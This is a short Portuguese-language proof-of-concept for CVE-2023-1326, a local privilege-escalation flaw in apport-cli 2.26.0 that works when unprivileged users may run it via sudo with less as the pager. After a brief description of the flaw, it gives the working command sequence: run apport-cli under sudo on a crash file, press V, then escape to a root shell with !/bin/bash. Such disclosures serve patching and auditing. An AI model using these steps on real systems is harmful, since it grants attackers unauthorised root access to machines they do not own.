
Exploit de prova de conceito para CVE-2023-1326, uma vulnerabilidade de escalonamento de privilégios no apport-cli 2.26.0 quando configurado com sudo e less como paginador.
Uma prova de conceito para CVE-2023–1326 no apport-cli 2.26.0
Esta vulnerabilidade é de escalada de privilégio no apport-cli 2.26.0, semelhante à CVE-2023–26604, esta vulnerabilidade só funciona se atribuída no sudoers:

Foi encontrado um ataque de escalada de privilégio no apport-cli 2.26.0 e anteriores, semelhante ao CVE-2023-26604. Se um sistema for especialmente configurado para permitir que usuários não privilegiados executem sudo apport-cli, less estiver configurado como pager e o tamanho do terminal puder ser definido: um atacante local pode escalar privilégio.
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash
